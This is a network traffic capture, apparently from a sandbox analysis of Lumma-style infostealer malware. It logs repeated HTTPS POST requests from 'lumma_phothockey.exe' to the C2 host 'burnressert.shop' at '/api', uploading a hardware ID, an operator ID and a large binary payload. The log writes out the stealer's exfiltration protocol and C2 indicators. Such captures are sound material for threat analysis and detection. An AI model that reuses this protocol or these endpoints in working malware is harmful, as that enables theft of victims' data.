6c 31 6c 75 47 37 54 71 68 6c 52 7a 51 4e 6e 38 4f 6f 46 4e 2f 6c 45 78 4e 68 2b 68 61 45 36 73 39 35 70 44 79 4f 66 4a 64 72 6e 65 59 47 73 43 71 75 Data Ascii: 425fLI9ggGqGjglGaVhTqr6kV7O7sd7vdhpaQim/o0QagGA8n2KFeZJcAsyniRqmbKGAtaqyHbzjyhhDq/yhRJlAsq1NoEGoh05IROqY06i9pVGyenMdbzYYC1D4/2SVDRO5as2gwvmDn49VaxqC/uylUXJ7Mp2stFgaAWn+4wSbwHEuTyCCaofOiUUp21EqPfZAo/t1zrrl1luG7TqhlRzQNn8OoFN/lExNh+haE6s95pDyOfJdrneYGsCqu
2025-01-14 16:02:25 UTC	1369	IN	Data Raw: 41 73 43 34 4d 49 30 66 71 52 59 33 4c 52 36 35 62 45 79 6b 2b 5a 46 48 77 4f 7a 64 64 72 33 46 62 58 38 66 34 37 54 4b 45 33 52 4f 6d 50 77 4c 69 68 32 32 45 6e 49 56 41 36 68 77 51 4b 37 2b 32 56 4f 42 38 34 39 39 76 35 63 77 4c 51 75 73 38 34 6b 62 62 51 66 4d 73 54 69 45 43 4b 63 58 4e 43 34 66 71 32 42 4e 6f 76 65 54 54 38 37 67 78 6e 32 37 30 47 74 2f 54 65 32 36 6a 51 77 73 56 6f 43 56 4f 70 38 44 74 6c 45 76 61 67 7a 72 59 55 66 6a 71 74 6c 49 78 65 58 4c 66 62 2f 52 62 57 73 41 6f 76 57 4c 46 47 4d 4b 79 37 55 37 6a 41 43 6a 48 44 51 32 48 36 42 70 52 36 72 2b 6c 41 79 42 71 73 68 69 38 34 38 6f 58 41 43 74 39 49 30 43 4c 42 47 4f 70 58 32 4b 41 65 5a 4a 63 43 55 5a 70 47 56 45 6f 50 47 59 52 74 33 34 77 33 4f 37 30 6d 52 6d 41 36 58 6f 6a 42 74 Data Ascii: AsC4MI0fqRY3LR65bEyk+ZFHwOzddr3FbX8f47TKE3ROmPwLih22EnIVA6hwQK7+2VOB8499v5cwLQus84kbbQfMsTiECKcXNC4fq2BNoveTT87gxn270Gt/Te26jQwsVoCVOp8DtlEvagzrYUfjqtlIxeXLfb/RbWsAovWLFGMKy7U7jACjHDQ2H6BpR6r+lAyBqshi848oXACt9I0CLBGOpX2KAeZJcCUZpGVEoPGYRt34w3O70mRmA6XojBt
2025-01-14 16:02:25 UTC	1369	IN	Data Raw: 6a 43 64 54 65 68 52 49 53 4d 45 36 7a 35 64 73 2b 57 65 55 34 48 7a 6a 33 32 2f 6c 7a 41 74 43 36 72 38 6a 52 4a 69 48 4d 57 36 4d 6f 49 45 72 78 55 34 4a 78 57 76 59 6b 79 6d 38 5a 56 48 79 4f 6e 41 66 72 72 5a 59 57 4a 4e 37 62 71 4e 44 43 78 57 67 4a 30 6d 6a 67 47 72 55 53 39 71 44 4f 74 68 52 2b 4f 71 32 55 44 42 37 38 39 77 74 64 4e 74 61 77 65 6d 2b 6f 45 58 59 77 72 47 75 44 4b 4e 42 71 38 51 4e 69 45 66 6f 47 42 47 6f 50 53 66 44 49 47 71 79 47 4c 7a 6a 79 68 4e 46 71 37 32 6a 56 52 7a 51 4e 6e 38 4f 6f 46 4e 2f 6c 45 37 4b 42 47 73 5a 6b 61 67 2b 70 78 49 78 65 2f 50 63 71 48 66 61 47 6f 66 73 66 71 44 45 57 41 4e 77 4c 67 37 68 41 75 6c 46 58 42 71 56 61 78 2b 43 2f 75 79 74 45 44 49 77 38 68 68 38 38 67 6d 64 45 32 6b 39 73 70 4d 4c 41 2f 4c Data Ascii: jCdTehRISME6z5ds+WeU4Hzj32/lzAtC6r8jRJiHMW6MoIErxU4JxWvYkym8ZVHyOnAfrrZYWJN7bqNDCxWgJ0mjgGrUS9qDOthR+Oq2UDB789wtdNtawem+oEXYwrGuDKNBq8QNiEfoGBGoPSfDIGqyGLzjyhNFq72jVRzQNn8OoFN/lE7KBGsZkag+pxIxe/PcqHfaGofsfqDEWANwLg7hAulFXBqVax+C/uytEDIw8hh88gmdE2k9spMLA/L
2025-01-14 16:02:25 UTC	1369	IN	Data Raw: 2b 35 58 79 6c 6b 41 2b 73 2b 47 65 32 79 69 77 79 58 71 6f 68 35 6f 63 56 75 62 68 75 67 76 62 51 71 53 78 54 4e 75 69 71 63 4d 35 67 57 4b 69 6b 54 76 48 63 48 74 76 47 58 51 73 6a 38 6a 7a 54 7a 32 43 67 31 4e 4f 4f 79 79 69 73 69 54 74 6a 38 5a 63 30 34 70 52 38 2b 49 77 4f 36 4b 32 79 35 2f 35 39 62 33 71 71 42 4f 72 57 58 4d 44 31 44 34 2f 36 62 56 44 52 65 6b 75 64 6f 33 6c 72 32 51 79 39 71 44 4f 74 77 43 2f 75 67 31 77 7a 64 71 70 63 36 39 4e 52 36 66 77 75 67 37 49 6c 54 55 6a 44 75 75 7a 75 49 43 72 5a 54 48 69 38 42 72 43 59 46 34 2f 33 5a 46 50 61 71 68 7a 71 4d 6d 53 68 31 54 66 75 36 76 78 64 69 41 4d 65 71 4c 4d 41 6a 6f 52 63 31 49 77 58 70 53 45 43 33 39 64 6b 43 6a 2b 79 50 49 75 4f 5a 4b 47 6b 63 34 36 4c 61 52 6a 64 62 6b 2b 74 74 33 Data Ascii: +5XylkA+s+Ge2yiwyXqoh5ocVubhugvbQqSxTNuiqcM5gWKikTvHcHtvGXQsj8jzTz2Cg1NOOyyisiTtj8Zc04pR8+IwO6K2y5/59b3qqBOrWXMD1D4/6bVDRekudo3lr2Qy9qDOtwC/ug1wzdqpc69NR6fwug7IlTUjDuuzuICrZTHi8BrCYF4/3ZFPaqhzqMmSh1Tfu6vxdiAMeqLMAjoRc1IwXpSEC39dkCj+yPIuOZKGkc46LaRjdbk+tt3
2025-01-14 16:02:25 UTC	1369	IN	Data Raw: 6e 4b 31 71 46 55 47 71 64 7a 49 78 50 77 65 54 49 62 4b 4b 58 4a 69 30 43 34 36 4b 7a 56 43 52 4f 2f 2f 4a 39 6c 55 33 2b 55 51 55 6e 47 36 56 68 58 62 4b 2f 76 6b 4c 49 36 39 6c 71 70 4e 67 6e 51 7a 75 43 75 73 52 55 61 6b 36 59 37 6e 50 4e 43 62 64 52 61 48 52 48 38 44 4d 59 39 4b 4c 4c 55 34 48 7a 6a 32 7a 7a 6a 7a 6f 6a 54 62 47 36 30 6c 51 72 44 64 4b 75 4f 34 34 62 70 56 59 4f 47 6a 4b 6c 59 55 71 31 34 70 52 41 37 75 6e 65 63 49 33 70 66 57 34 44 72 66 32 63 42 53 78 41 67 4c 4e 39 31 54 54 6d 57 58 41 62 57 2b 74 2b 43 2f 75 79 72 45 2f 42 35 4d 68 73 6f 70 70 50 59 77 71 69 37 4a 6f 5a 59 43 2f 44 72 54 66 4e 51 2b 59 58 63 48 78 48 35 53 5a 50 73 72 4c 42 48 4a 32 78 6d 69 6e 6b 68 7a 70 79 51 37 71 36 6e 46 51 30 58 49 37 38 4c 38 31 56 35 6c Data Ascii: nK1qFUGqdzIxPweTIbKKXJi0C46KzVCRO//J9lU3+UQUnG6VhXbK/vkLI69lqpNgnQzuCusRUak6Y7nPNCbdRaHRH8DMY9KLLU4Hzj2zzjzojTbG60lQrDdKuO44bpVYOGjKlYUq14pRA7unecI3pfW4Drf2cBSxAgLN91TTmWXAbW+t+C/uyrE/B5MhsoppPYwqi7JoZYC/DrTfNQ+YXcHxH5SZPsrLBHJ2xminkhzpyQ7q6nFQ0XI78L81V5l

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49847	104.21.67.165	443	5392	C:\Users\user\Desktop\lumma_phothockey.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:02:26 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=08MM87VUB3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12797 Host: burnressert.shop
2025-01-14 16:02:26 UTC	12797	OUT	Data Raw: 2d 2d 30 38 4d 4d 38 37 56 55 42 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 44 30 43 31 44 32 41 31 43 41 45 30 46 34 31 44 41 36 43 32 30 32 44 30 32 41 33 30 46 32 30 0d 0a 2d 2d 30 38 4d 4d 38 37 56 55 42 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 38 4d 4d 38 37 56 55 42 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 30 38 4d 4d 38 37 56 55 42 33 0d 0a 43 6f 6e 74 65 6e 74 Data Ascii: --08MM87VUB3Content-Disposition: form-data; name="hwid"0D0C1D2A1CAE0F41DA6C202D02A30F20--08MM87VUB3Content-Disposition: form-data; name="pid"2--08MM87VUB3Content-Disposition: form-data; name="lid"jMw1IE--SHELLS--08MM87VUB3Content
2025-01-14 16:02:26 UTC	1126	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:02:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jhct1pr5r7dltmlh4m1mfflhev; expires=Sat, 10 May 2025 09:49:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RrluMuop7Do%2B5iH4aUTmr4wvMX7pKuwq1Gzg418LkE5HX%2BoAuzc6eC60TcBbjERC5bnEPQ6ln1exlBwAHQLf%2BAH4mN%2FmWNdCVaPezV1f3vsoW4TWdkmqMEdDPlW2mS0AAJLF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901ed9b0fd2d42bb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1604&rtt_var=607&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13729&delivery_rate=1795817&cwnd=193&unsent_bytes=0&cid=572f969b06ad538f&ts=863&x=0"
2025-01-14 16:02:26 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-14 16:02:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49856	104.21.67.165	443	5392	C:\Users\user\Desktop\lumma_phothockey.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:02:27 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0KB5605WJEBH73T1XE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15077 Host: burnressert.shop
2025-01-14 16:02:27 UTC	15077	OUT	Data Raw: 2d 2d 30 4b 42 35 36 30 35 57 4a 45 42 48 37 33 54 31 58 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 44 30 43 31 44 32 41 31 43 41 45 30 46 34 31 44 41 36 43 32 30 32 44 30 32 41 33 30 46 32 30 0d 0a 2d 2d 30 4b 42 35 36 30 35 57 4a 45 42 48 37 33 54 31 58 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 4b 42 35 36 30 35 57 4a 45 42 48 37 33 54 31 58 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c Data Ascii: --0KB5605WJEBH73T1XEContent-Disposition: form-data; name="hwid"0D0C1D2A1CAE0F41DA6C202D02A30F20--0KB5605WJEBH73T1XEContent-Disposition: form-data; name="pid"2--0KB5605WJEBH73T1XEContent-Disposition: form-data; name="lid"jMw1IE--SHELL
2025-01-14 16:02:27 UTC	1126	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:02:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n8a42iiddb3n9cio1dc9n7r0b5; expires=Sat, 10 May 2025 09:49:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zaAH1cq91wU2o%2Bo2gdM9lE3oAppdryY0OWVndSEf2XHivrqgcRU%2FOb9I1nk6TmQQEr%2Bj371cj3aUCid4EQFIOtyrbknfsTmmtO5yiL5QqWZQNlnuKKu%2FabIGuKaGu4dCOMNu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901ed9b95f0d42d0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2325&min_rtt=2319&rtt_var=882&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2837&recv_bytes=16017&delivery_rate=1231547&cwnd=207&unsent_bytes=0&cid=d2e371f45f6566ff&ts=501&x=0"
2025-01-14 16:02:27 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-14 16:02:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49865	104.21.67.165	443	5392	C:\Users\user\Desktop\lumma_phothockey.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:02:28 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4V2Y8OAHGZM6QN5FNB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20402 Host: burnressert.shop
2025-01-14 16:02:28 UTC	15331	OUT	Data Raw: 2d 2d 34 56 32 59 38 4f 41 48 47 5a 4d 36 51 4e 35 46 4e 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 44 30 43 31 44 32 41 31 43 41 45 30 46 34 31 44 41 36 43 32 30 32 44 30 32 41 33 30 46 32 30 0d 0a 2d 2d 34 56 32 59 38 4f 41 48 47 5a 4d 36 51 4e 35 46 4e 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 34 56 32 59 38 4f 41 48 47 5a 4d 36 51 4e 35 46 4e 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c Data Ascii: --4V2Y8OAHGZM6QN5FNBContent-Disposition: form-data; name="hwid"0D0C1D2A1CAE0F41DA6C202D02A30F20--4V2Y8OAHGZM6QN5FNBContent-Disposition: form-data; name="pid"3--4V2Y8OAHGZM6QN5FNBContent-Disposition: form-data; name="lid"jMw1IE--SHELL
2025-01-14 16:02:28 UTC	5071	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 b6 b9 fe 28 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 Data Ascii: (X6K~`iO\_,mi`m?ls}Qm/
2025-01-14 16:02:29 UTC	1127	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:02:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0prd5ji0hq1qpr6pa2bu0mr403; expires=Sat, 10 May 2025 09:49:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YIUUgA038gjil3yITHA45EQWedaj27DYDUI36OGTeS%2B08KU7PI6SOuAj5OEYcUVOz5kp5PpQD3%2B%2FJIZe4v5YjtuVJ%2FFrQXbSpTl4CSlGoj1vT7qfMBYOCbH0WRgLBHSR5wNb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901ed9c1db5e7c99-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1842&min_rtt=1840&rtt_var=694&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21364&delivery_rate=1572428&cwnd=235&unsent_bytes=0&cid=03ba409dbf6e0426&ts=627&x=0"
2025-01-14 16:02:29 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-14 16:02:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	59956	104.21.67.165	443	5392	C:\Users\user\Desktop\lumma_phothockey.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:02:30 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=89C64EREFXGU82 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1356 Host: burnressert.shop
2025-01-14 16:02:30 UTC	1356	OUT	Data Raw: 2d 2d 38 39 43 36 34 45 52 45 46 58 47 55 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 44 30 43 31 44 32 41 31 43 41 45 30 46 34 31 44 41 36 43 32 30 32 44 30 32 41 33 30 46 32 30 0d 0a 2d 2d 38 39 43 36 34 45 52 45 46 58 47 55 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 39 43 36 34 45 52 45 46 58 47 55 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 38 39 43 36 34 45 52 Data Ascii: --89C64EREFXGU82Content-Disposition: form-data; name="hwid"0D0C1D2A1CAE0F41DA6C202D02A30F20--89C64EREFXGU82Content-Disposition: form-data; name="pid"1--89C64EREFXGU82Content-Disposition: form-data; name="lid"jMw1IE--SHELLS--89C64ER
2025-01-14 16:02:30 UTC	1131	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:02:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dh2aceroc41kujtrrf9k1j17nn; expires=Sat, 10 May 2025 09:49:09 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9OVA1u7%2BXB4Tz%2BiCxShxonh6Jz%2FQuDHLa2zdzeSR3B%2F1dH%2BvJ0%2FbBFRlmyZEk7odLAoyokWTuPSBAkVQd6L9Ll5BFbR%2FVEPOTFPssflgbQamM8CyHiP6Q54rg2NTOu84IQyE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901ed9ca4c95423b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2443&min_rtt=2379&rtt_var=1021&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2269&delivery_rate=1008287&cwnd=228&unsent_bytes=0&cid=0c8d1ed0f7558c9a&ts=468&x=0"
2025-01-14 16:02:30 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-14 16:02:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	59965	104.21.67.165	443	5392	C:\Users\user\Desktop\lumma_phothockey.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:02:31 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=KEEZASA1J User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1061 Host: burnressert.shop
2025-01-14 16:02:31 UTC	1061	OUT	Data Raw: 2d 2d 4b 45 45 5a 41 53 41 31 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 44 30 43 31 44 32 41 31 43 41 45 30 46 34 31 44 41 36 43 32 30 32 44 30 32 41 33 30 46 32 30 0d 0a 2d 2d 4b 45 45 5a 41 53 41 31 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 45 45 5a 41 53 41 31 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 4b 45 45 5a 41 53 41 31 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 Data Ascii: --KEEZASA1JContent-Disposition: form-data; name="hwid"0D0C1D2A1CAE0F41DA6C202D02A30F20--KEEZASA1JContent-Disposition: form-data; name="pid"1--KEEZASA1JContent-Disposition: form-data; name="lid"jMw1IE--SHELLS--KEEZASA1JContent-Dis
2025-01-14 16:02:31 UTC	1119	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:02:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=brqc0jk9qdqln7h5decfp0anan; expires=Sat, 10 May 2025 09:49:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cysd3qjchu1v85sYPXHrWuWSgayV4arsp6pL1WoD2MJQ4TGdOLVwwQSXztc9YhSyQaiDLIyISYz5VdNIHkX3Duien1Llix4UJL%2FAeXq8CbwOx3loWLx5wLNxF94E9UNrf1A8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901ed9d16cee0f3d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2732&min_rtt=2499&rtt_var=1104&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1969&delivery_rate=1168467&cwnd=143&unsent_bytes=0&cid=a8d542fdaf645d29&ts=679&x=0"
2025-01-14 16:02:31 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-14 16:02:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	59975	104.21.67.165	443	5392	C:\Users\user\Desktop\lumma_phothockey.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:02:32 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 115 Host: burnressert.shop
2025-01-14 16:02:32 UTC	115	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61 26 68 77 69 64 3d 30 44 30 43 31 44 32 41 31 43 41 45 30 46 34 31 44 41 36 43 32 30 32 44 30 32 41 33 30 46 32 30 Data Ascii: act=get_message&ver=4.0&lid=jMw1IE--SHELLS&j=aa77e78b6b0dd1b2226e7b799532ab3a&hwid=0D0C1D2A1CAE0F41DA6C202D02A30F20
